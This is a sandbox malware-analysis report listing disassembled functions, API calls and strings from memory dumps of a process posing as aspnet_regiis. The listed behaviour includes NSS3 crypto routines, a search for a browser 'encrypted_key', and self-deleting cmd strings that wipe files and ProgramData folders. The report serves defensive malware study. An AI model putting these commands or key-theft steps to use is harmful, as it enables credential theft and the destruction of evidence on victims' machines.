                                                                                                                                                                              • Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2680509045.000000006CB00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680807353.000000006CCDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680870106.000000006CCDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680890543.000000006CCE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680908405.000000006CCE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6cb00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: DoesK11_Mechanism
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 622698949-0
                                                                                                                                                                              • Opcode ID: c609708ecc05f08e56bb69c1b70e37aefe8df33e1a02ba745add6446eb52fb33
                                                                                                                                                                              • Instruction ID: 4ca0eff70f415d8f37ea29f608b72782266e0a0e2a9580bab72a1f1b1dc236c6
                                                                                                                                                                              • Opcode Fuzzy Hash: c609708ecc05f08e56bb69c1b70e37aefe8df33e1a02ba745add6446eb52fb33
                                                                                                                                                                              • Instruction Fuzzy Hash: F03166717529D127EF0D10666D31BEE244ECB6931EF450038F90AF57C0FA99AA1702EB
                                                                                                                                                                              Function 6CB94CF0 Relevance: 21.2, APIs: 14, Instructions: 237memoryCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • PK11_SignatureLen.NSS3(?), ref: 6CB94D80
                                                                                                                                                                              • PORT_Alloc_Util.NSS3(00000000), ref: 6CB94D95
                                                                                                                                                                              • PORT_NewArena_Util.NSS3(00000800), ref: 6CB94DF2
                                                                                                                                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CB94E2C
                                                                                                                                                                              • PR_SetError.NSS3(FFFFE028,00000000), ref: 6CB94E43
                                                                                                                                                                              • PORT_NewArena_Util.NSS3(00000800), ref: 6CB94E58
                                                                                                                                                                              • SGN_CreateDigestInfo_Util.NSS3(00000001,?,?), ref: 6CB94E85
                                                                                                                                                                              • DER_Encode_Util.NSS3(?,?,6CCE05A4,00000000), ref: 6CB94EA7
                                                                                                                                                                              • PK11_SignWithMechanism.NSS3(?,-00000001,00000000,?,?), ref: 6CB94F17
                                                                                                                                                                              • DSAU_EncodeDerSigWithLen.NSS3(?,?,?), ref: 6CB94F45
                                                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CB94F62
                                                                                                                                                                              • PORT_FreeArena_Util.NSS3(?,00000001), ref: 6CB94F7A
                                                                                                                                                                              • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CB94F89
                                                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CB94FC8
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2680509045.000000006CB00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680807353.000000006CCDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680870106.000000006CCDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680890543.000000006CCE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680908405.000000006CCE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6cb00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Util$Arena_$ErrorFreeItem_K11_WithZfree$Alloc_CreateDigestEncodeEncode_Info_MechanismSignSignature
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2843999940-0
                                                                                                                                                                              • Opcode ID: 013ac8ff7bf6d236f6ee6a8e9e628aa3ac26bc0afc31c9aa8e1c11351ce029ab
                                                                                                                                                                              • Instruction ID: 4a641ef98ca6649722e1dddcb4d3fe23e1bd81ba08a01cf75b5a127e3412b5dd
                                                                                                                                                                              • Opcode Fuzzy Hash: 013ac8ff7bf6d236f6ee6a8e9e628aa3ac26bc0afc31c9aa8e1c11351ce029ab
                                                                                                                                                                              • Instruction Fuzzy Hash: FA818F719083429FEB01CF24D840B5AB7E4EB8A758F158939F96DDB641EB30E905CB92
                                                                                                                                                                              Function 02A18271 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 120COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • _memset.LIBCMT ref: 02A18296
                                                                                                                                                                              • _memset.LIBCMT ref: 02A182A5
                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,?,?), ref: 02A182BA
                                                                                                                                                                                • Part of subcall function 02A104E7: lstrcpy.KERNEL32(00000000,00000000), ref: 02A1050D
                                                                                                                                                                              • ShellExecuteEx.SHELL32(?), ref: 02A18456
                                                                                                                                                                              • _memset.LIBCMT ref: 02A18465
                                                                                                                                                                              • _memset.LIBCMT ref: 02A18477
                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 02A18487
                                                                                                                                                                                • Part of subcall function 02A10609: lstrlen.KERNEL32(?,00000000,?,?,?,?,02A1709C,02A36C18,00000000,02A366CD,?,?,?,?,02A1858F), ref: 02A1061D
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcpy.KERNEL32(00000000,?), ref: 02A10645
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcat.KERNEL32(?,00000000), ref: 02A10650
                                                                                                                                                                                • Part of subcall function 02A1058D: lstrcpy.KERNEL32(00000000,?), ref: 02A105BD
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcpy.KERNEL32(00000000,?), ref: 02A105F5
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcat.KERNEL32(?,?), ref: 02A105FF
                                                                                                                                                                              Strings
                                                                                                                                                                              • /c timeout /t 10 & del /f /q ", xrefs: 02A182E5
                                                                                                                                                                              • " & rd /s /q "C:\ProgramData\, xrefs: 02A18333
                                                                                                                                                                              • /c timeout /t 10 & rd /s /q "C:\ProgramData\, xrefs: 02A18390
                                                                                                                                                                              • " & exit, xrefs: 02A183DA
                                                                                                                                                                              • " & exit, xrefs: 02A18389
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _memsetlstrcpy$lstrcat$ExecuteExitFileModuleNameProcessShelllstrlen
                                                                                                                                                                              • String ID: " & exit$" & exit$" & rd /s /q "C:\ProgramData\$/c timeout /t 10 & del /f /q "$/c timeout /t 10 & rd /s /q "C:\ProgramData\
                                                                                                                                                                              • API String ID: 2823247455-1079830800
                                                                                                                                                                              • Opcode ID: 070a97e2432df5a97b6d8fd52be539a78c375ed59fce2ac2bf3642ad027d8e09
                                                                                                                                                                              • Instruction ID: 93e03c11fcbab199f045e48762afafb80ca043cb5ad38541ca4a9308768b3fe5
                                                                                                                                                                              • Opcode Fuzzy Hash: 070a97e2432df5a97b6d8fd52be539a78c375ed59fce2ac2bf3642ad027d8e09
                                                                                                                                                                              • Instruction Fuzzy Hash: 6551C6B1D802399BDB21EF25CE80A9DB3BDAB44714F4100E5AB18B3151DB30AFCA8F54
                                                                                                                                                                              Function 6CBC6C30 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 58stringCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6CBC781D,00000000,6CBBBE2C,?,6CBC6B1D,?,?,?,?,00000000,00000000,6CBC781D), ref: 6CBC6C40
                                                                                                                                                                              • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6CBC781D,?,6CBBBE2C,?), ref: 6CBC6C58
                                                                                                                                                                              • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6CBC781D), ref: 6CBC6C6F
                                                                                                                                                                              • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6CBC6C84
                                                                                                                                                                              • PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6CBC6C96
                                                                                                                                                                                • Part of subcall function 6CB71240: TlsGetValue.KERNEL32(00000040,?,6CB7116C,NSPR_LOG_MODULES), ref: 6CB71267
                                                                                                                                                                                • Part of subcall function 6CB71240: EnterCriticalSection.KERNEL32(?,?,?,6CB7116C,NSPR_LOG_MODULES), ref: 6CB7127C
                                                                                                                                                                                • Part of subcall function 6CB71240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6CB7116C,NSPR_LOG_MODULES), ref: 6CB71291
                                                                                                                                                                                • Part of subcall function 6CB71240: PR_Unlock.NSS3(?,?,?,?,6CB7116C,NSPR_LOG_MODULES), ref: 6CB712A0
                                                                                                                                                                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6CBC6CAA
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2680509045.000000006CB00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680807353.000000006CCDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680870106.000000006CCDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680890543.000000006CCE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680908405.000000006CCE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6cb00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: strncmp$CriticalEnterSectionSecureUnlockValuegetenvstrcmp
                                                                                                                                                                              • String ID: NSS_DEFAULT_DB_TYPE$dbm$dbm:$extern:$rdb:$sql:
                                                                                                                                                                              • API String ID: 4221828374-3736768024
                                                                                                                                                                              • Opcode ID: 269a7fabcaa96558d57c1b06b7d1162fd0376a821132ff9bc84475580e16c067
                                                                                                                                                                              • Instruction ID: e4f98ea99ac17a38846db8874c451298730f4ee2e994284ac96dc820c0055dcf
                                                                                                                                                                              • Opcode Fuzzy Hash: 269a7fabcaa96558d57c1b06b7d1162fd0376a821132ff9bc84475580e16c067
                                                                                                                                                                              • Instruction Fuzzy Hash: 1D01A2F170238227EA1027B95D4AF37369DDF91258F140431FE08E0A81FAA2E52482B7
                                                                                                                                                                              Function 6CBD4E60 Relevance: 19.7, APIs: 13, Instructions: 186COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • PR_SetErrorText.NSS3(00000000,00000000,?,6CB978F8), ref: 6CBD4E6D
                                                                                                                                                                                • Part of subcall function 6CB709E0: TlsGetValue.KERNEL32(00000000,?,?,?,6CB706A2,00000000,?), ref: 6CB709F8
                                                                                                                                                                                • Part of subcall function 6CB709E0: malloc.MOZGLUE(0000001F), ref: 6CB70A18
                                                                                                                                                                                • Part of subcall function 6CB709E0: memcpy.VCRUNTIME140(?,?,00000001), ref: 6CB70A33
                                                                                                                                                                              • PR_SetError.NSS3(FFFFE09A,00000000,?,?,?,6CB978F8), ref: 6CBD4ED9
                                                                                                                                                                                • Part of subcall function 6CBC5920: NSSUTIL_ArgHasFlag.NSS3(flags,printPolicyFeedback,?,?,?,?,?,?,00000000,?,00000000,?,6CBC7703,?,00000000,00000000), ref: 6CBC5942
                                                                                                                                                                                • Part of subcall function 6CBC5920: NSSUTIL_ArgHasFlag.NSS3(flags,policyCheckIdentifier,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6CBC7703), ref: 6CBC5954
                                                                                                                                                                                • Part of subcall function 6CBC5920: NSSUTIL_ArgHasFlag.NSS3(flags,policyCheckValue,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6CBC596A
                                                                                                                                                                                • Part of subcall function 6CBC5920: SECOID_Init.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6CBC5984
                                                                                                                                                                                • Part of subcall function 6CBC5920: NSSUTIL_ArgGetParamValue.NSS3(disallow,00000000), ref: 6CBC5999
                                                                                                                                                                                • Part of subcall function 6CBC5920: free.MOZGLUE(00000000), ref: 6CBC59BA
                                                                                                                                                                                • Part of subcall function 6CBC5920: NSSUTIL_ArgGetParamValue.NSS3(allow,00000000), ref: 6CBC59D3
                                                                                                                                                                                • Part of subcall function 6CBC5920: free.MOZGLUE(00000000), ref: 6CBC59F5
                                                                                                                                                                                • Part of subcall function 6CBC5920: NSSUTIL_ArgGetParamValue.NSS3(disable,00000000), ref: 6CBC5A0A
                                                                                                                                                                                • Part of subcall function 6CBC5920: free.MOZGLUE(00000000), ref: 6CBC5A2E
                                                                                                                                                                                • Part of subcall function 6CBC5920: NSSUTIL_ArgGetParamValue.NSS3(enable,00000000), ref: 6CBC5A43
                                                                                                                                                                              • SECMOD_FindModule.NSS3(?,?,?,?,?,?,?,?,?,6CB978F8), ref: 6CBD4EB3
                                                                                                                                                                                • Part of subcall function 6CBD4820: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6CBD4EB8,?,?,?,?,?,?,?,?,?,?,6CB978F8), ref: 6CBD484C
                                                                                                                                                                                • Part of subcall function 6CBD4820: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6CBD4EB8,?,?,?,?,?,?,?,?,?,?,6CB978F8), ref: 6CBD486D
                                                                                                                                                                                • Part of subcall function 6CBD4820: PR_SetError.NSS3(FFFFE09A,00000000,00000000,-00000001,00000000,?,6CBD4EB8,?), ref: 6CBD4884
                                                                                                                                                                              • SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?,?,?,6CB978F8), ref: 6CBD4EC0
                                                                                                                                                                                • Part of subcall function 6CBD4470: TlsGetValue.KERNEL32(00000000,?,6CB97296,00000000), ref: 6CBD4487
                                                                                                                                                                                • Part of subcall function 6CBD4470: EnterCriticalSection.KERNEL32(?,?,?,6CB97296,00000000), ref: 6CBD44A0
                                                                                                                                                                                • Part of subcall function 6CBD4470: PR_Unlock.NSS3(?,?,?,?,6CB97296,00000000), ref: 6CBD44BB
                                                                                                                                                                              • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6CB978F8), ref: 6CBD4F16
                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6CB978F8), ref: 6CBD4F2E
                                                                                                                                                                              • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,6CB978F8), ref: 6CBD4F40
                                                                                                                                                                              • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6CB978F8), ref: 6CBD4F6C
                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6CB978F8), ref: 6CBD4F80
                                                                                                                                                                              • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6CB978F8), ref: 6CBD4F8F
                                                                                                                                                                              • PK11_UpdateSlotAttribute.NSS3(?,6CCADCB0,00000000), ref: 6CBD4FFE
                                                                                                                                                                              • PK11_UserDisableSlot.NSS3(0000001E), ref: 6CBD501F
                                                                                                                                                                              • SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?,?,6CB978F8), ref: 6CBD506B
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2680509045.000000006CB00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680807353.000000006CCDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680870106.000000006CCDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680890543.000000006CCE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680908405.000000006CCE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6cb00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Value$Param$CriticalEnterErrorFlagModuleSectionUnlockfree$DestroyK11_Slotstrcmp$AttributeDisableFindInitTextUpdateUsermallocmemcpy
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 560490210-0
                                                                                                                                                                              • Opcode ID: 14b88c68b5ff87d6023b536d26d88adf95941bc03db07235694ce33b955d7a78
                                                                                                                                                                              • Instruction ID: dc29de06115542cbcae870f61f07b72fd897de24594108295a9708781a95b53f
                                                                                                                                                                              • Opcode Fuzzy Hash: 14b88c68b5ff87d6023b536d26d88adf95941bc03db07235694ce33b955d7a78
                                                                                                                                                                              • Instruction Fuzzy Hash: 4751D3F19006869BEB119F24EC41A9E37B8EF0531DF160635EC0A96A11FB32E558CAD2
                                                                                                                                                                              Function 6CB7ACC0 Relevance: 19.6, APIs: 13, Instructions: 150stringCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2680509045.000000006CB00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680807353.000000006CCDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680870106.000000006CCDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680890543.000000006CCE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680908405.000000006CCE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6cb00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: free$Unlock$ErrorValuecallocmallocmemcpystrcpystrlen
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 786543732-0
                                                                                                                                                                              • Opcode ID: d677b9ef1ba745035c23f4632deed2755cbffdae48c1514d9555f20adced1241
                                                                                                                                                                              • Instruction ID: 307d17b57c56487b2731b7e74b78fdb7f8a8320dbe9a07f534f96ea5454820aa
                                                                                                                                                                              • Opcode Fuzzy Hash: d677b9ef1ba745035c23f4632deed2755cbffdae48c1514d9555f20adced1241
                                                                                                                                                                              • Instruction Fuzzy Hash: 8051BFB1E001669BDFA0DF58D9416AE7778FB0A349F140025DC28A3B11E731E955CFE2
                                                                                                                                                                              Function 6CC54C40 Relevance: 19.3, APIs: 3, Strings: 8, Instructions: 97COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • sqlite3_value_text16.NSS3(?), ref: 6CC54CAF
                                                                                                                                                                              • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6CC54CFD
                                                                                                                                                                              • sqlite3_value_text16.NSS3(?), ref: 6CC54D44
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2680509045.000000006CB00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680807353.000000006CCDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680870106.000000006CCDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680890543.000000006CCE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680908405.000000006CCE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6cb00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: sqlite3_value_text16$sqlite3_log
                                                                                                                                                                              • String ID: API call with %s database connection pointer$abort due to ROLLBACK$another row available$bad parameter or other API misuse$invalid$no more rows available$out of memory$unknown error
                                                                                                                                                                              • API String ID: 2274617401-4033235608
                                                                                                                                                                              • Opcode ID: 9a8b23d51133bf30682e18c64031c38b145be25660c1b23a2eaf7363c04415c6
                                                                                                                                                                              • Instruction ID: 899ee4513837cfb0dd33124531213b98d8a6f1ebb4429c0146085acc1ff43228
                                                                                                                                                                              • Opcode Fuzzy Hash: 9a8b23d51133bf30682e18c64031c38b145be25660c1b23a2eaf7363c04415c6
                                                                                                                                                                              • Instruction Fuzzy Hash: C0314872E089516BD704CB2AE8007E97372B7C3358FD50569D8245BE59F721BC7283EA
                                                                                                                                                                              Function 6CBB6EF0 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 94COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • PR_LogPrint.NSS3(C_DigestUpdate), ref: 6CBB6F16
                                                                                                                                                                              • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CBB6F44
                                                                                                                                                                              • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CBB6F53
                                                                                                                                                                                • Part of subcall function 6CC9D930: PL_strncpyz.NSS3(?,?,?), ref: 6CC9D963
                                                                                                                                                                              • PR_LogPrint.NSS3(?,00000000), ref: 6CBB6F69
                                                                                                                                                                              • PR_LogPrint.NSS3( pPart = 0x%p,?), ref: 6CBB6F88
                                                                                                                                                                              • PR_LogPrint.NSS3( ulPartLen = %d,?), ref: 6CBB6FA1
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2680509045.000000006CB00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680807353.000000006CCDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680870106.000000006CCDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680890543.000000006CCE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680908405.000000006CCE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6cb00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Print$L_strncpyz$L_strcatn
                                                                                                                                                                              • String ID: hSession = 0x%x$ pPart = 0x%p$ ulPartLen = %d$ (CK_INVALID_HANDLE)$C_DigestUpdate
                                                                                                                                                                              • API String ID: 1003633598-226530419
                                                                                                                                                                              • Opcode ID: 6b6a469e248b72527fd79bdf6d342df28388fd23c24c5c87f8824344a10ea137
                                                                                                                                                                              • Instruction ID: a121e0bb3ef9e7cefff76b3593cc266569de503432cb291da74c2353a8e8307f
                                                                                                                                                                              • Opcode Fuzzy Hash: 6b6a469e248b72527fd79bdf6d342df28388fd23c24c5c87f8824344a10ea137
                                                                                                                                                                              • Instruction Fuzzy Hash: 0931BC34601195ABDF489B64DC58BAA77B5EB4B319F094025E808F7A11EF30DE49CBA2
                                                                                                                                                                              Function 02A1580D Relevance: 18.2, APIs: 12, Instructions: 188stringCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • _memset.LIBCMT ref: 02A15845
                                                                                                                                                                              • _memset.LIBCMT ref: 02A15856
                                                                                                                                                                                • Part of subcall function 02A11DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 02A11DFD
                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 02A15881
                                                                                                                                                                              • lstrcat.KERNEL32(?), ref: 02A1589F
                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 02A158B3
                                                                                                                                                                              • lstrcat.KERNEL32(?), ref: 02A158C6
                                                                                                                                                                                • Part of subcall function 02A104E7: lstrcpy.KERNEL32(00000000,00000000), ref: 02A1050D
                                                                                                                                                                                • Part of subcall function 02A11D92: GetFileAttributesA.KERNEL32(?,?,?,02A0DA7F,?,?,?), ref: 02A11D99
                                                                                                                                                                                • Part of subcall function 02A0819F: StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,?,?,?,?,02A0CC90,?,?), ref: 02A081E5
                                                                                                                                                                                • Part of subcall function 02A07FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,02A0E756,?,?,?), ref: 02A07FC7
                                                                                                                                                                                • Part of subcall function 02A07FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,02A0E756,?,?,?), ref: 02A07FDE
